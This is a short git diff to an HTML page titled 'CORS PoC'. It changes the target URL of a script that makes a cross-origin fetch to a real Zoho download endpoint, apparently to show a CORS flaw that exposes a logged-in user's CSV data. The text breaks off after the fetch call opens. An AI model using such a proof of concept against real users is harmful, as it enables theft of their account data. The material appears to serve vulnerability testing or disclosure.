--- a/cors.html
+++ b/cors.html
@@ -4,7 +4,7 @@
 <h3>CORS PoC</h3>
 
 <script>
-var url = "https://download.zoho.com/webdownload?x-service=assist&event-id=3602439000000039001&x-cli-msg=eyJzY29wZSI6ImFzc2lzdCIsInpzb2lkIjoiOTA1MjQzMjI0IiwiZmlsZV90eXBlIjoiY3N2In0=";
+var url = "https://download.zoho.com/webdownload?x-service=assistlab&event-id=3602439000000037002&x-cli-msg=eyJzY29wZSI6ImFzc2lzdCIsInpzb2lkIjoiOTA1MjQzMjI0IiwiZmlsZV90eXBlIjoiY3N2In0=";
 
 fetch(url, {
     method: "GET",
